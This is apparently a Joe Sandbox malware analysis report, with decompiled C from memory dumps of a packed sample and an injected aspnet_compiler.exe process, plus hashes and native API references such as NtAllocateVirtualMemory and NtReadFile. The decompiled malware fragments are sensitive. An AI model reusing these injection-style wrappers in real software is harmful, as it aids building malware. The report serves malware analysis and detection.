Instruction ID: cf9a96633a2b1c76a599cf8772dd081596b7723040bc91ffe3302bfbce5b6662
Opcode Fuzzy Hash: 530244a98ddb84f175ca4279fdba408c247d85c4c43a41b99677b9f053e487d2
Instruction Fuzzy Hash: 0DE0E574E04208EFCB84DFA8D941A9CFBF0FB48310F20C1AAD808A3340D731AA51DB85

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000352A9 Relevance: .2, Instructions: 200
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E000352A9(void* __eax, signed int __ecx, signed int __edx, void* __edi, signed int __esi, void* __fp0) {
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t98;
				void* _t99;
				signed int _t100;
				void* _t102;
				signed int _t104;
				signed int _t110;
				signed int _t117;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t126;
				intOrPtr _t128;
				void* _t133;
				signed int _t138;
				signed int _t139;
				void* _t146;
				void* _t148;

				L0:
				while(1) {
					L0:
					_t120 = __esi;
					_t116 = __edi;
					_t108 = __edx;
					_t103 = __ecx;
					asm("rcl byte [ebp-0x1ef9558c], 1");
					asm("stosb");
					asm("gs cmpsb");
					L2:
					while(_t133 > 0) {
						asm("insb");
						asm("lodsd");
						asm("insb");
						asm("invalid");
						 *(_t116 + 0x27) =  *(_t116 + 0x27) | _t120;
						asm("daa");
						asm("adc eax, 0xb4a2568");
						asm("iretd");
						_pop(_t108);
						_push(cs);
						asm("int1");
						asm("daa");
						asm("arpl [edi-0x329cabce], dx");
						_t103 = _t103 - 1;
						if(_t103 >= 0) {
							continue;
						} else {
							L5:
							asm("adc ebx, [edx-0x5c]");
							asm("movsb");
							asm("movsd");
							asm("lds ecx, [edx]");
							 *((intOrPtr*)(_t116 - 0x6eadb917)) = _t128;
							_t108 = _t108 - _t108;
							 *((intOrPtr*)(_t98 - 0x12)) = ds;
						}
						break;
					}
					L6:
					_pop(_t99);
					asm("out dx, al");
					asm("a16 jmp 0xebce6a4");
					asm("cmpsb");
					asm("invalid");
					asm("loop 0xffffff95");
					_pop(_t126);
					asm("adc [ecx-0x7c21d8c8], bh");
					_t100 = _t99 - 1;
					asm("sbb edx, eax");
				}
				_push(es);
				asm("loope 0x66");
				asm("loope 0x6a");
				 *__ecx =  *__ecx ^ 0x00000090;
				_t104 = __ecx &  *(__ecx + 0xefd7cb5);
				asm("int3");
				_pop(0x26e554f8);
				asm("adc [eax+0x5094596d], ebp");
				_t117 = __edi - 1;
				_t110 = __edx ^  *(_t104 + 0x58) |  *(__edx ^  *(_t104 + 0x58));
				_t138 = _t110;
				while(1) {
					L8:
					asm("adc ah, [edx+0x1a]");
					if(_t138 == 0) {
						break;
					}
					_pop(_t102);
					_t100 = _t110;
					asm("stc");
					 *(_t102 +  *((intOrPtr*)(_t120 - 0x61))) =  *(_t102 +  *((intOrPtr*)(_t120 - 0x61))) ^ _t117;
					_push(0xb4);
					_push(0xb4);
					_t104 = 0x26e5544c;
					asm("out 0xc3, al");
					asm("a16 movsb");
					_push(_t120);
					asm("les ebp, [edx-0x411fad99]");
					asm("std");
					asm("cld");
					_t139 =  *0x5ce14d8e & 0x000000f3;
					while(1) {
						asm("repe dec ecx");
						_pop(_t82);
						_t111 = 0xad;
						if(_t139 == 0) {
							break;
						}
						asm("stc");
						ds = 0xad;
						 *[ds:edi] =  *[ds:edi] - 0xc7;
						asm("out 0xd5, al");
						asm("in eax, dx");
						_t139 = 0x1b;
						_t117 = _t126;
						asm("pushad");
						_push(es);
						if(0x1b != 0) {
							continue;
						} else {
							if(0x1b != 0) {
								goto L8;
							} else {
								_t19 = _t117 - 0x2b590938;
								_t20 = _t120;
								_t120 =  *_t19;
								 *_t19 = _t20;
								goto L14;
							}
						}
						L23:
						asm("in al, 0x98");
						if(_t148 <= 0) {
							L15:
							_t100 = _t100 - 1;
							_t121 = _t121 + 1;
							_t24 = _t111 + 0x4636ce6b;
							 *_t24 =  *(_t111 + 0x4636ce6b) & _t126;
							asm("repe cmp [edi*8-0x2f7c2881], eax");
							asm("sbb ch, [0xa96df3e2]");
							asm("scasb");
							if( *_t24 < 0) {
								_t126 = _t78;
								asm("iretd");
								_push(_t111);
								asm("sti");
								_t82 = 0x72;
								asm("rol dword [ebx], 1");
								asm("adc byte [ecx+0x5e4e0187], 0xbe");
								break;
							}
							goto L23;
						}
						asm("out dx, al");
						_push(_t117);
						_t122 = _t121 ^ _t111;
						asm("retf");
						asm("loopne 0xffffffa3");
						_t80 =  *0xffc74678;
					}
					_t146 = _t121 - 1;
					_t122 = 0x7ace6675;
				}
				L14:
				_t121 = _t120 + 1;
				asm("int1");
				_t111 = _t110 |  *0x26E554F8;
				_push(_t126);
				_push(es);
				 *0x331fb128 = 0x26e554f8;
				asm("movsd");
				_t77 = _t117;
				_t117 = 0x26e554f8;
				asm("xlatb");
				asm("loope 0xfffffffe");
				asm("pushad");
				_t78 = _t77 - 0x46;
				goto L15;
			}

0x000352a9
0x000352a9
0x000352a9
0x000352a9
0x000352a9
0x000352a9
0x000352a9
0x000352a9
0x00035257
0x00035258
0x00000000
0x0003525a
0x0003525c
0x0003525d
0x0003525e
0x0003525f
0x00035261
0x00035263
0x00035266
0x0003526b
0x0003526c
0x0003526d
0x0003526e
0x0003526f
0x00035270
0x0003527b
0x0003527c
0x00000000
0x0003527e
0x0003527e
0x0003527e
0x00035281
0x00035282
0x00035283
0x00035285
0x00035290
0x00035292
0x00035292
0x00000000
0x0003527c
0x00035293
0x00035293
0x00035294
0x00035295
0x0003529b
0x0003529c
0x0003529e
0x000352a0
0x000352a1
0x000352a7
0x000352a8
0x000352a8
0x000352ad
0x000352ae
0x000352b0
0x000352b2
0x000352b7
0x000352c2
0x000352c3
0x000352c4
0x000352cb
0x000352cc
0x000352cc
0x000352cd
0x000352cd
0x000352cd
0x000352d0
0x00000000
0x00000000
0x000352d4
0x000352d6
0x000352da
0x000352dd
0x000352df
0x000352e0
0x000352e1
0x000352e3
0x000352e8
0x000352eb
0x000352f6
0x000352fc
0x000352fd
0x000352ff
0x00035305
0x00035305
0x00035307
0x00035308
0x0003530a
0x00000000
0x00000000
0x0003530c
0x0003530e
0x00035319
0x0003531d
0x00035322
0x00035328
0x0003532a
0x0003532b
0x0003532c
0x0003532d
0x00000000
0x0003532f
0x0003532f
0x00000000
0x00035331
0x00035331
0x00035331
0x00035331
0x00035331
0x00000000
0x00035331
0x0003532f
0x000353a6
0x000353a6
0x000353a8
0x0003534f
0x0003534f
0x00035350
0x00035353
0x00035353
0x00035359
0x00035361
0x00035367
0x00035368
0x0003536a
0x00035370
0x00035371
0x00035372
0x00035375
0x00035377
0x00035379
0x00000000
0x00035379
0x00000000
0x00035368
0x000353aa
0x000353b0
0x000353b1
0x000353b4
0x000353b5
0x000353b6
0x000353b6
0x0003537d
0x0003537f
0x0003537f
0x00035337
0x00035337
0x0003533d
0x0003533e
0x00035340
0x00035341
0x00035342
0x00035347
0x00035348
0x00035348
0x00035349
0x0003534a
0x0003534c
0x0003534d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.372796636.0000000000032000.00000002.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true

Associated: 00000000.00000002.372754430.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.372808331.000000000003F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.372873373.00000000000C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f51f1961d6de31c628c762ac4e650edf3550509a097e9506376f94799290d3
Instruction ID: 0efc7e0a2f5a9423c60ea0d5fd0fe1b6e334dff18548bae8ca3ae9b924cc5cf2
Opcode Fuzzy Hash: d3f51f1961d6de31c628c762ac4e650edf3550509a097e9506376f94799290d3
Instruction Fuzzy Hash: E951CA72408A925FD717CF348891AD6BFA9EF87365B2802DDD4908F2A3D3608587C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A11C54 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c53f4a5e85b8ebd3ecba5132df804178fc6f7afc0709230da8e1973d1b3839
Instruction ID: f4c7c56b4280941125e2769279004c326927ecf52d8481024d6d1e114162e809
Opcode Fuzzy Hash: 49c53f4a5e85b8ebd3ecba5132df804178fc6f7afc0709230da8e1973d1b3839
Instruction Fuzzy Hash: 25710FB4E042188FCB10CFA8E884BDDFBB1BB49314F14812AE915BB391DB749885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A10340 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc7b3af8f0044e2482b617fb913cd2bf0e382ad1ec92a77e6538e2cfff1e6ab
Instruction ID: 1571a9bc1f67458141f6965eff5ccdcc847f4f841f6c1b36f70df60d4f4da336
Opcode Fuzzy Hash: 5dc7b3af8f0044e2482b617fb913cd2bf0e382ad1ec92a77e6538e2cfff1e6ab
Instruction Fuzzy Hash: 70510374E002189FDB14DFA9D9847DDBBB1FB49304F108129E915BB391DB749885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A130BE Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2caabb7f76ceee86c76e7c0d8f0b9f78e08775cfbd9baf711566053ac16b6b
Instruction ID: ecf5901de1837045af5097d1ef4ed2f5e53e6850ce4f792e3edc9fd8b6fc32cb
Opcode Fuzzy Hash: 9d2caabb7f76ceee86c76e7c0d8f0b9f78e08775cfbd9baf711566053ac16b6b
Instruction Fuzzy Hash: 235110B1D042589FCF10DFA9D984BEDFBB1BF49304F14812AE415AB2A0DB749989CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00A13514 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c438867ee10e0cbb338af4c6ce5da6c9d29cb3115b40259c03d49408a6bd01
Instruction ID: 1c4e53eac7225abd3856c0616f8e085fd73f39eeb648dc0974d9cd9a3f5f4d3c
Opcode Fuzzy Hash: 49c438867ee10e0cbb338af4c6ce5da6c9d29cb3115b40259c03d49408a6bd01
Instruction Fuzzy Hash: 8B51FDB1D002589FDF10CFA9D984ADEFBB1BF49314F20852AE415AB3A0DB749986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00A10364 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef182376b79fe7793e9ef5c101ccfcbabb73e24e4cecae05ac808fe85bb96356
Instruction ID: bbb18a7d3f73c92d3efe73de2468a53ce2f99f2ea85b8ece0db68fcd24c46115
Opcode Fuzzy Hash: ef182376b79fe7793e9ef5c101ccfcbabb73e24e4cecae05ac808fe85bb96356
Instruction Fuzzy Hash: AC5100B1D042189FCF10DFA9D984BEDFBB1BF49314F108529E815AB260DB749989CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A1037C Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c3a6b156a3baa7ac6ef3a15b823c11612dfe7b3b0c20befc772092b6a6a5e9
Instruction ID: 0f0d4404d70972f006321106ab0b3f601f427d2ad55ea8b8fae9a13d931df363
Opcode Fuzzy Hash: 96c3a6b156a3baa7ac6ef3a15b823c11612dfe7b3b0c20befc772092b6a6a5e9
Instruction Fuzzy Hash: E051FFB1D002589FDF10CFA9C984BDEBBB1BF49314F20852AE415AB350DB749985CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00A141AF Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891bbb9990cae1cae0a26082759573666a8cb072aeaf01c0917f90430080fa38
Instruction ID: 6e4138aeee46b717cfd14610ce4a267316db6715cb3ae114d9e4a5e30bef08d6
Opcode Fuzzy Hash: 891bbb9990cae1cae0a26082759573666a8cb072aeaf01c0917f90430080fa38
Instruction Fuzzy Hash: F331D770D15A58CEDB28CF6AC8487D9BBB2AFC9300F15D2EAC50CA6251DB740AC6CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00A141C0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e0a6f8c20d3128b3aa5a2901b81d46017b8e519cbee3ac8d7bff0670c6ca79
Instruction ID: d85cbb952a0d4d631d6197ddfad4f415711339816e57611762d29f0d2bae9f90
Opcode Fuzzy Hash: 77e0a6f8c20d3128b3aa5a2901b81d46017b8e519cbee3ac8d7bff0670c6ca79
Instruction Fuzzy Hash: EF31C370D15A28CEDB68CF6AC8487D9B6F6AFC9300F11D2AA950CA6250DB741AC5CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exePID: 6272, Parent PID: 1548COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	5.9%
Total number of Nodes:	581
Total number of Limit Nodes:	66

Executed Functions

Function 0041867A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041867A(void* __edx, void* __edi, signed int __esi, intOrPtr _a3, char _a7, intOrPtr _a11, intOrPtr _a15, intOrPtr _a19, intOrPtr _a23, intOrPtr _a27, char _a31, intOrPtr _a35, char _a39) {
				void* _t24;
				intOrPtr* _t36;
				void* _t38;

				 *((intOrPtr*)(__edi + __esi * 8 - 0x74aa701c)) =  *((intOrPtr*)(__edi + __esi * 8 - 0x74aa701c)) + __edx;
				_t19 = _a3;
				_t36 = _a3 + 0xc48;
				E004191D0(__edi, _a3, _t36,  *((intOrPtr*)(_t19 + 0x10)), 0, 0x2a);
				_t10 =  &_a39; // 0x413a21
				_t12 =  &_a31; // 0x413d62
				_t18 =  &_a7; // 0x413d62
				_t24 =  *((intOrPtr*)( *_t36))( *_t18, _a11, _a15, _a19, _a23, _a27,  *_t12, _a35,  *_t10, __esi, _t38); // executed
				return _t24;
			}

0x0041867b
0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4
b=A, xrefs: 004186A2, 004186B0

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 2689bdfc233189ef0e6b2ff6fa3c43122a97693a4e8a851d7985702370a063dc
Instruction ID: e049933846b7baa0a81b8becc7a14c211ae46a169d7c22c04aebed586678641c
Opcode Fuzzy Hash: 2689bdfc233189ef0e6b2ff6fa3c43122a97693a4e8a851d7985702370a063dc
Instruction Fuzzy Hash: 3CF0E2B6200208AFDB58CF89CC84EEB77A9AF8C354F058259BA0D97241D630E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4
b=A, xrefs: 004186A2, 004186B0

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186CB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186BD, 004186C4
b=A, xrefs: 004186A2, 004186B0

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 3f5d2cba6ae048b50a1a0119b45b097e2ddc11c28f82db590389e802fd9f19e6
Instruction ID: 0c69b3ad37953dfd000ced9b389c5dbe2c51f492ee365e04a20303b5ce730023
Opcode Fuzzy Hash: 3f5d2cba6ae048b50a1a0119b45b097e2ddc11c28f82db590389e802fd9f19e6
Instruction Fuzzy Hash: 77F0B7B6204149AFCB04DF99DC94DEB77A9AF8C318B19864DFA4D93601C634E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185CA Relevance: 1.5, APIs: 1, Instructions: 48
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004185CA(void* __edx, void* __eflags) {
				void* _t33;

				_t33 = __edx;
				if (__eflags != 0) goto L5;
				_push(0x8dbaf913);
			}

0x004185ca
0x004185cf
0x004185d0

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f7cbd7fc0969414a674bc8ca99c4637e3e9ae287eb8b340a1f6027a3f84e3b2e
Instruction ID: abe82f64ce613578cb71296675caf8202f722367e04cf6f6b4f4fb7b7f85d329
Opcode Fuzzy Hash: f7cbd7fc0969414a674bc8ca99c4637e3e9ae287eb8b340a1f6027a3f84e3b2e
Instruction Fuzzy Hash: 5E0108B6205248AFCB04CF98DC95DEB37A9AF8C354F15424DFA0997241D630ED518BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185D0(void* __edx, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a52) {
				void* _t32;

				_t32 = __edx;
			}

0x004185d0

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187AA Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E004187AA(void* __eax, void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v117;
				long _t18;
				void* _t28;

				asm("daa");
				asm("clc");
				_t14 = _a4;
				_t5 = _t14 + 0xc60; // 0xca0
				E004191D0(_t28, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}

0x004187ab
0x004187ae
0x004187b3
0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fe1f0f85ede958bc9e1ef5048c91862cd464ba1909acd4de4755de50fe50b111
Instruction ID: 2c1a1dfb65638079a3be3993b81bac7282395dafd856929c9553ec9b074be529
Opcode Fuzzy Hash: fe1f0f85ede958bc9e1ef5048c91862cd464ba1909acd4de4755de50fe50b111
Instruction Fuzzy Hash: 89F058B1600209BFCB18CF88CC85EEB77A9AF88740F15822DFE0897241C230E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418700 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
